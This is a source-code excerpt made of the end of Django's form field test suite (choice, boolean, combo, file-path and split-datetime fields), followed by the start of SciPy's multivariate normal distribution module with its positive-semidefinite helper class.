# If you want cleaning an empty value to return a different type, tell the field
def test_typedchoicefield_6(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertEqual(None, f.clean(''))
def test_typedchoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f._has_changed(None, ''))
# NullBooleanField ############################################################
def test_nullbooleanfield_1(self):
f = NullBooleanField()
self.assertEqual(None, f.clean(''))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertEqual(None, f.clean(None))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('1'))
self.assertEqual(None, f.clean('2'))
self.assertEqual(None, f.clean('3'))
self.assertEqual(None, f.clean('hello'))
def test_nullbooleanfield_2(self):
# Make sure that the internal value is preserved if using HiddenInput (#7753)
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm()
self.assertHTMLEqual('<input type="hidden" name="hidden_nullbool1" value="True" id="id_hidden_nullbool1" /><input type="hidden" name="hidden_nullbool2" value="False" id="id_hidden_nullbool2" />', str(f))
def test_nullbooleanfield_3(self):
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm({ 'hidden_nullbool1': 'True', 'hidden_nullbool2': 'False' })
self.assertEqual(None, f.full_clean())
self.assertEqual(True, f.cleaned_data['hidden_nullbool1'])
self.assertEqual(False, f.cleaned_data['hidden_nullbool2'])
def test_nullbooleanfield_4(self):
# Make sure we're compatible with MySQL, which uses 0 and 1 for its boolean
# values. (#9609)
NULLBOOL_CHOICES = (('1', 'Yes'), ('0', 'No'), ('', 'Unknown'))
class MySQLNullBooleanForm(Form):
nullbool0 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool1 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool2 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
f = MySQLNullBooleanForm({ 'nullbool0': '1', 'nullbool1': '0', 'nullbool2': '' })
self.assertEqual(None, f.full_clean())
self.assertEqual(True, f.cleaned_data['nullbool0'])
self.assertEqual(False, f.cleaned_data['nullbool1'])
self.assertEqual(None, f.cleaned_data['nullbool2'])
def test_nullbooleanfield_changed(self):
f = NullBooleanField()
self.assertTrue(f._has_changed(False, None))
self.assertTrue(f._has_changed(None, False))
self.assertFalse(f._has_changed(None, None))
self.assertFalse(f._has_changed(False, False))
self.assertTrue(f._has_changed(True, False))
self.assertTrue(f._has_changed(True, None))
self.assertTrue(f._has_changed(True, False))
# MultipleChoiceField #########################################################
def test_multiplechoicefield_1(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, ())
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, ['3'])
def test_multiplechoicefield_2(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual([], f.clean(''))
self.assertEqual([], f.clean(None))
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertEqual([], f.clean([]))
self.assertEqual([], f.clean(()))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, ['3'])
def test_multiplechoicefield_3(self):
f = MultipleChoiceField(choices=[('Numbers', (('1', 'One'), ('2', 'Two'))), ('Letters', (('3','A'),('4','B'))), ('5','Other')])
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '5'], f.clean([1, 5]))
self.assertEqual(['1', '5'], f.clean([1, '5']))
self.assertEqual(['1', '5'], f.clean(['1', 5]))
self.assertEqual(['1', '5'], f.clean(['1', '5']))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 6 is not one of the available choices.'", f.clean, ['6'])
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 6 is not one of the available choices.'", f.clean, ['1','6'])
def test_multiplechoicefield_changed(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two'), ('3', 'Three')])
self.assertFalse(f._has_changed(None, None))
self.assertFalse(f._has_changed([], None))
self.assertTrue(f._has_changed(None, ['1']))
self.assertFalse(f._has_changed([1, 2], ['1', '2']))
self.assertFalse(f._has_changed([2, 1], ['1', '2']))
self.assertTrue(f._has_changed([1, 2], ['1']))
self.assertTrue(f._has_changed([1, 2], ['1', '3']))
# TypedMultipleChoiceField ############################################################
# TypedMultipleChoiceField is just like MultipleChoiceField, except that coerced types
# will be returned:
def test_typedmultiplechoicefield_1(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1], f.clean(['1']))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 2 is not one of the available choices.'", f.clean, ['2'])
def test_typedmultiplechoicefield_2(self):
# Different coercion, same validation.
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual([1.0], f.clean(['1']))
def test_typedmultiplechoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual([True], f.clean(['-1']))
def test_typedmultiplechoicefield_4(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1, -1], f.clean(['1','-1']))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 2 is not one of the available choices.'", f.clean, ['1','2'])
def test_typedmultiplechoicefield_5(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedMultipleChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(ValidationError, "'Select a valid choice. B is not one of the available choices.'", f.clean, ['B'])
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
def test_typedmultiplechoicefield_6(self):
# Non-required fields aren't required
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual([], f.clean([]))
def test_typedmultiplechoicefield_7(self):
# If you want cleaning an empty value to return a different type, tell the field
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertEqual(None, f.clean([]))
def test_typedmultiplechoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f._has_changed(None, ''))
# ComboField ##################################################################
def test_combofield_1(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()])
self.assertEqual('test@example.com', f.clean('test@example.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 20 characters (it has 28).'", f.clean, 'longemailaddress@example.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_combofield_2(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()], required=False)
self.assertEqual('test@example.com', f.clean('test@example.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 20 characters (it has 28).'", f.clean, 'longemailaddress@example.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
# FilePathField ###############################################################
def test_filepathfield_1(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
self.assertTrue(fix_os_paths(path).endswith('/django/forms/'))
def test_filepathfield_2(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path)
f.choices = [p for p in f.choices if p[0].endswith('.py')]
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/util.py', 'util.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. fields.py is not one of the available choices.'", f.clean, 'fields.py')
assert fix_os_paths(f.clean(path + 'fields.py')).endswith('/django/forms/fields.py')
def test_filepathfield_3(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path, match='^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/util.py', 'util.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_4(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
f = FilePathField(path=path, recursive=True, match='^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/extras/__init__.py', 'extras/__init__.py'),
('/django/forms/extras/widgets.py', 'extras/widgets.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/util.py', 'util.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_folders(self):
path = os.path.dirname(upath(__file__)) + '/filepath_test_files/'
f = FilePathField(path=path, allow_folders=True, allow_files=False)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
f = FilePathField(path=path, allow_folders=True, allow_files=True)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/.dot-file', '.dot-file'),
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
('/tests/forms_tests/tests/filepath_test_files/fake-image.jpg', 'fake-image.jpg'),
('/tests/forms_tests/tests/filepath_test_files/real-text-file.txt', 'real-text-file.txt'),
]
actual = fix_os_paths(f.choices)
self.assertEqual(len(expected), len(actual))
for exp, got in zip(expected, actual):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
# SplitDateTimeField ##########################################################
def test_splitdatetimefield_1(self):
from django.forms.widgets import SplitDateTimeWidget
f = SplitDateTimeField()
self.assertIsInstance(f.widget, SplitDateTimeWidget)
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)]))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(self, ValidationError, r"'Enter a valid date\.', u?'Enter a valid time\.'", f.clean, ['hello', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
def test_splitdatetimefield_2(self):
f = SplitDateTimeField(required=False)
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)]))
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean(['2006-01-10', '07:30']))
self.assertEqual(None, f.clean(None))
self.assertEqual(None, f.clean(''))
self.assertEqual(None, f.clean(['']))
self.assertEqual(None, f.clean(['', '']))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(self, ValidationError, r"'Enter a valid date\.', u?'Enter a valid time\.'", f.clean, ['hello', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', ''])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['', '07:30'])
def test_splitdatetimefield_changed(self):
f = SplitDateTimeField(input_date_formats=['%d/%m/%Y'])
self.assertFalse(f._has_changed(['11/01/2012', '09:18:15'], ['11/01/2012', '09:18:15']))
self.assertTrue(f._has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['2008-05-06', '12:40:00']))
self.assertFalse(f._has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:40']))
self.assertTrue(f._has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:41']))
|
dex4er/django
|
tests/forms_tests/tests/test_fields.py
|
Python
|
bsd-3-clause
| 69,654
|
#
# Author: Joris Vankerschaver 2013
#
from __future__ import division, print_function, absolute_import
import numpy as np
import scipy.linalg
from scipy.misc import doccer
from scipy.special import gammaln, psi, multigammaln
from scipy._lib._util import check_random_state
__all__ = ['multivariate_normal',
'matrix_normal',
'dirichlet',
'wishart',
'invwishart',
'special_ortho_group',
'ortho_group']
_LOG_2PI = np.log(2 * np.pi)
_LOG_2 = np.log(2)
_LOG_PI = np.log(np.pi)
_doc_random_state = """\
random_state : None or int or np.random.RandomState instance, optional
If int or RandomState, use it for drawing the random variates.
If None (or np.random), the global np.random state is used.
Default is None.
"""
def _squeeze_output(out):
"""
Remove single-dimensional entries from array and convert to scalar,
if necessary.
"""
out = out.squeeze()
if out.ndim == 0:
out = out[()]
return out
def _eigvalsh_to_eps(spectrum, cond=None, rcond=None):
"""
Determine which eigenvalues are "small" given the spectrum.
This is for compatibility across various linear algebra functions
that should agree about whether or not a Hermitian matrix is numerically
singular and what its numerical matrix rank is.
This is designed to be compatible with scipy.linalg.pinvh.
Parameters
----------
spectrum : 1d ndarray
Array of eigenvalues of a Hermitian matrix.
cond, rcond : float, optional
Cutoff for small eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are
considered zero.
If None or -1, suitable machine precision is used.
Returns
-------
eps : float
Magnitude cutoff for numerical negligibility.
"""
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = spectrum.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
eps = cond * np.max(abs(spectrum))
return eps
def _pinv_1d(v, eps=1e-5):
"""
A helper function for computing the pseudoinverse.
Parameters
----------
v : iterable of numbers
This may be thought of as a vector of eigenvalues or singular values.
eps : float
Values with magnitude no greater than eps are considered negligible.
Returns
-------
v_pinv : 1d float ndarray
A vector of pseudo-inverted numbers.
"""
return np.array([0 if abs(x) <= eps else 1/x for x in v], dtype=float)
class _PSD(object):
"""
Compute coordinated functions of a symmetric positive semidefinite matrix.
This class addresses two issues. Firstly it allows the pseudoinverse,
the logarithm of the pseudo-determinant, and the rank of the matrix
to be computed using one call to eigh instead of three.
Secondly it allows these functions to be computed in a way
that gives mutually compatible results.
All of the functions are computed with a common understanding as to
which of the eigenvalues are to be considered negligibly small.
The functions are designed to coordinate with scipy.linalg.pinvh()
but not necessarily with np.linalg.det() or with np.linalg.matrix_rank().
Parameters
----------
M : array_like
Symmetric positive semidefinite matrix (2-D).
cond, rcond : float, optional
Cutoff for small eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are
considered zero.
If None or -1, suitable machine precision is used.
lower : bool, optional
Whether the pertinent array data is taken from the lower
or upper triangle of M. (Default: lower)
check_finite : bool, optional
Whether to check that the input matrices contain only finite
numbers. Disabling may give a performance gain, but may result
in problems (crashes, non-termination) if the inputs do contain
infinities or NaNs.
allow_singular : bool, optional
Whether to allow a singular matrix. (Default: True)
Notes
-----
The arguments are similar to those of scipy.linalg.pinvh().
"""
def __init__(self, M, cond=None, rcond=None, lower=True,
check_finite=True, allow_singular=True):
# Compute the symmetric eigendecomposition.
# Note that eigh takes care of array conversion, chkfinite,
# and assertion that the matrix is square.
s, u = scipy.linalg.eigh(M, lower=lower, check_finite=check_finite)
eps = _eigvalsh_to_eps(s, cond, rcond)
if np.min(s) < -eps:
raise ValueError('the input matrix must be positive semidefinite')
d = s[s > eps]
if len(d) < len(s) and not allow_singular:
raise np.linalg.LinAlgError('singular matrix')
s_pinv = _pinv_1d(s, eps)
U = np.multiply(u, np.sqrt(s_pinv))
# Initialize the eagerly precomputed attributes.
self.rank = len(d)
self.U = U
self.log_pdet = np.sum(np.log(d))
# Initialize an attribute to be lazily computed.
self._pinv = None
@property
def pinv(self):
if self._pinv is None:
self._pinv = np.dot(self.U, self.U.T)
return self._pinv
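# Illustrative sketch (the helper name `_demo_psd_summary` is hypothetical and
# not part of this module): _PSD exposes the rank, the log pseudo-determinant
# and the pseudo-inverse of a symmetric positive semidefinite matrix from a
# single eigendecomposition, e.g. for a rank-deficient covariance matrix.
def _demo_psd_summary(M):
    """Return (rank, log_pdet, pinv) of `M` as computed by _PSD (illustrative)."""
    psd = _PSD(np.asarray(M, dtype=float), allow_singular=True)
    return psd.rank, psd.log_pdet, psd.pinv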
class multi_rv_generic(object):
"""
Class which encapsulates common functionality between all multivariate
distributions.
"""
def __init__(self, seed=None):
super(multi_rv_generic, self).__init__()
self._random_state = check_random_state(seed)
@property
def random_state(self):
""" Get or set the RandomState object for generating random variates.
This can be either None or an existing RandomState object.
If None (or np.random), use the RandomState singleton used by np.random.
If already a RandomState instance, use it.
If an int, use a new RandomState instance seeded with seed.
"""
return self._random_state
@random_state.setter
def random_state(self, seed):
self._random_state = check_random_state(seed)
def _get_random_state(self, random_state):
if random_state is not None:
return check_random_state(random_state)
else:
return self._random_state
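# Illustrative sketch (hypothetical helper, not part of the module): as the
# `random_state` property above documents, a seed may be None, an int, or a
# RandomState instance; `check_random_state` normalises all three, so equal
# integer seeds reproduce identical random streams.
def _demo_seed_reproducibility(seed=1234):
    """Return True if two RandomState objects built from `seed` agree (illustrative)."""
    first = check_random_state(seed).standard_normal(3)
    second = check_random_state(seed).standard_normal(3)
    return bool(np.all(first == second))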
class multi_rv_frozen(object):
"""
Class which encapsulates common functionality between all frozen
multivariate distributions.
"""
@property
def random_state(self):
return self._dist._random_state
@random_state.setter
def random_state(self, seed):
self._dist._random_state = check_random_state(seed)
_mvn_doc_default_callparams = """\
mean : array_like, optional
Mean of the distribution (default zero)
cov : array_like, optional
Covariance matrix of the distribution (default one)
allow_singular : bool, optional
Whether to allow a singular covariance matrix. (Default: False)
"""
_mvn_doc_callparams_note = \
"""Setting the parameter `mean` to `None` is equivalent to having `mean`
be the zero-vector. The parameter `cov` can be a scalar, in which case
the covariance matrix is the identity times that value, a vector of
diagonal entries for the covariance matrix, or a two-dimensional
array_like.
"""
_mvn_doc_frozen_callparams = ""
_mvn_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
mvn_docdict_params = {
'_mvn_doc_default_callparams': _mvn_doc_default_callparams,
'_mvn_doc_callparams_note': _mvn_doc_callparams_note,
'_doc_random_state': _doc_random_state
}
mvn_docdict_noparams = {
'_mvn_doc_default_callparams': _mvn_doc_frozen_callparams,
'_mvn_doc_callparams_note': _mvn_doc_frozen_callparams_note,
'_doc_random_state': _doc_random_state
}
class multivariate_normal_gen(multi_rv_generic):
r"""
A multivariate normal random variable.
The `mean` keyword specifies the mean. The `cov` keyword specifies the
covariance matrix.
Methods
-------
``pdf(x, mean=None, cov=1, allow_singular=False)``
Probability density function.
``logpdf(x, mean=None, cov=1, allow_singular=False)``
Log of the probability density function.
``rvs(mean=None, cov=1, size=1, random_state=None)``
Draw random samples from a multivariate normal distribution.
``entropy()``
Compute the differential entropy of the multivariate normal.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_mvn_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the mean
and covariance parameters, returning a "frozen" multivariate normal
random variable:
rv = multivariate_normal(mean=None, cov=1, allow_singular=False)
- Frozen object with the same methods but holding the given
mean and covariance fixed.
Notes
-----
%(_mvn_doc_callparams_note)s
The covariance matrix `cov` must be a (symmetric) positive
semi-definite matrix. The determinant and inverse of `cov` are computed
as the pseudo-determinant and pseudo-inverse, respectively, so
that `cov` does not need to have full rank.
The probability density function for `multivariate_normal` is
.. math::
f(x) = \frac{1}{\sqrt{(2 \pi)^k \det \Sigma}}
\exp\left( -\frac{1}{2} (x - \mu)^T \Sigma^{-1} (x - \mu) \right),
where :math:`\mu` is the mean, :math:`\Sigma` the covariance matrix,
and :math:`k` is the dimension of the space where :math:`x` takes values.
.. versionadded:: 0.14.0
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.stats import multivariate_normal
>>> x = np.linspace(0, 5, 10, endpoint=False)
>>> y = multivariate_normal.pdf(x, mean=2.5, cov=0.5); y
array([ 0.00108914, 0.01033349, 0.05946514, 0.20755375, 0.43939129,
0.56418958, 0.43939129, 0.20755375, 0.05946514, 0.01033349])
>>> fig1 = plt.figure()
>>> ax = fig1.add_subplot(111)
>>> ax.plot(x, y)
The input quantiles can be any shape of array, as long as the last
axis labels the components. This allows us for instance to
display the frozen pdf for a non-isotropic random variable in 2D as
follows:
>>> x, y = np.mgrid[-1:1:.01, -1:1:.01]
>>> pos = np.dstack((x, y))
>>> rv = multivariate_normal([0.5, -0.2], [[2.0, 0.3], [0.3, 0.5]])
>>> fig2 = plt.figure()
>>> ax2 = fig2.add_subplot(111)
>>> ax2.contourf(x, y, rv.pdf(pos))
"""
def __init__(self, seed=None):
super(multivariate_normal_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, mvn_docdict_params)
def __call__(self, mean=None, cov=1, allow_singular=False, seed=None):
"""
Create a frozen multivariate normal distribution.
See `multivariate_normal_frozen` for more information.
"""
return multivariate_normal_frozen(mean, cov,
allow_singular=allow_singular,
seed=seed)
def _process_parameters(self, dim, mean, cov):
"""
Infer dimensionality from mean or covariance matrix, ensure that
mean and covariance are full vector resp. matrix.
"""
# Try to infer dimensionality
if dim is None:
if mean is None:
if cov is None:
dim = 1
else:
cov = np.asarray(cov, dtype=float)
if cov.ndim < 2:
dim = 1
else:
dim = cov.shape[0]
else:
mean = np.asarray(mean, dtype=float)
dim = mean.size
else:
if not np.isscalar(dim):
raise ValueError("Dimension of random variable must be a scalar.")
# Check input sizes and return full arrays for mean and cov if necessary
if mean is None:
mean = np.zeros(dim)
mean = np.asarray(mean, dtype=float)
if cov is None:
cov = 1.0
cov = np.asarray(cov, dtype=float)
if dim == 1:
mean.shape = (1,)
cov.shape = (1, 1)
if mean.ndim != 1 or mean.shape[0] != dim:
raise ValueError("Array 'mean' must be a vector of length %d." % dim)
if cov.ndim == 0:
cov = cov * np.eye(dim)
elif cov.ndim == 1:
cov = np.diag(cov)
elif cov.ndim == 2 and cov.shape != (dim, dim):
rows, cols = cov.shape
if rows != cols:
msg = ("Array 'cov' must be square if it is two dimensional,"
" but cov.shape = %s." % str(cov.shape))
else:
msg = ("Dimension mismatch: array 'cov' is of shape %s,"
" but 'mean' is a vector of length %d.")
msg = msg % (str(cov.shape), len(mean))
raise ValueError(msg)
elif cov.ndim > 2:
raise ValueError("Array 'cov' must be at most two-dimensional,"
" but cov.ndim = %d" % cov.ndim)
return dim, mean, cov
def _process_quantiles(self, x, dim):
"""
Adjust quantiles array so that last axis labels the components of
each data point.
"""
x = np.asarray(x, dtype=float)
if x.ndim == 0:
x = x[np.newaxis]
elif x.ndim == 1:
if dim == 1:
x = x[:, np.newaxis]
else:
x = x[np.newaxis, :]
return x
def _logpdf(self, x, mean, prec_U, log_det_cov, rank):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function
mean : ndarray
Mean of the distribution
prec_U : ndarray
A decomposition such that np.dot(prec_U, prec_U.T)
is the precision matrix, i.e. inverse of the covariance matrix.
log_det_cov : float
Logarithm of the determinant of the covariance matrix
rank : int
Rank of the covariance matrix.
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
dev = x - mean
maha = np.sum(np.square(np.dot(dev, prec_U)), axis=-1)
return -0.5 * (rank * _LOG_2PI + log_det_cov + maha)
def logpdf(self, x, mean, cov, allow_singular=False):
"""
Log of the multivariate normal probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_mvn_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
x = self._process_quantiles(x, dim)
psd = _PSD(cov, allow_singular=allow_singular)
out = self._logpdf(x, mean, psd.U, psd.log_pdet, psd.rank)
return _squeeze_output(out)
def pdf(self, x, mean, cov, allow_singular=False):
"""
Multivariate normal probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_mvn_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `x`
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
x = self._process_quantiles(x, dim)
psd = _PSD(cov, allow_singular=allow_singular)
out = np.exp(self._logpdf(x, mean, psd.U, psd.log_pdet, psd.rank))
return _squeeze_output(out)
def rvs(self, mean=None, cov=1, size=1, random_state=None):
"""
Draw random samples from a multivariate normal distribution.
Parameters
----------
%(_mvn_doc_default_callparams)s
size : integer, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray or scalar
Random variates of size (`size`, `N`), where `N` is the
dimension of the random variable.
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
random_state = self._get_random_state(random_state)
out = random_state.multivariate_normal(mean, cov, size)
return _squeeze_output(out)
def entropy(self, mean=None, cov=1):
"""
Compute the differential entropy of the multivariate normal.
Parameters
----------
%(_mvn_doc_default_callparams)s
Returns
-------
h : scalar
Entropy of the multivariate normal distribution
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
_, logdet = np.linalg.slogdet(2 * np.pi * np.e * cov)
return 0.5 * logdet
multivariate_normal = multivariate_normal_gen()
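# Illustrative sketch (hypothetical helper): the Notes above state that `cov`
# may be singular when ``allow_singular=True`` because the pseudo-determinant
# and pseudo-inverse are used.  The function below evaluates the log-density
# of a degenerate (rank-1) bivariate normal at its mean.
def _demo_singular_mvn_logpdf():
    """Evaluate the logpdf of a rank-1 bivariate normal at its mean (illustrative)."""
    mean = np.zeros(2)
    cov = np.array([[1.0, 1.0],
                    [1.0, 1.0]])  # rank 1, hence singular
    x = mean  # evaluate the density at the mean itself
    return multivariate_normal.logpdf(x, mean=mean, cov=cov,
                                      allow_singular=True)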
class multivariate_normal_frozen(multi_rv_frozen):
def __init__(self, mean=None, cov=1, allow_singular=False, seed=None):
"""
Create a frozen multivariate normal distribution.
Parameters
----------
mean : array_like, optional
Mean of the distribution (default zero)
cov : array_like, optional
Covariance matrix of the distribution (default one)
allow_singular : bool, optional
If this flag is True then tolerate a singular
covariance matrix (default False).
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
Examples
--------
When called with the default parameters, this will create a 1D random
variable with mean 0 and covariance 1:
>>> from scipy.stats import multivariate_normal
>>> r = multivariate_normal()
>>> r.mean
array([ 0.])
>>> r.cov
array([[1.]])
"""
self._dist = multivariate_normal_gen(seed)
self.dim, self.mean, self.cov = self._dist._process_parameters(
None, mean, cov)
self.cov_info = _PSD(self.cov, allow_singular=allow_singular)
def logpdf(self, x):
x = self._dist._process_quantiles(x, self.dim)
out = self._dist._logpdf(x, self.mean, self.cov_info.U,
self.cov_info.log_pdet, self.cov_info.rank)
return _squeeze_output(out)
def pdf(self, x):
return np.exp(self.logpdf(x))
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.mean, self.cov, size, random_state)
def entropy(self):
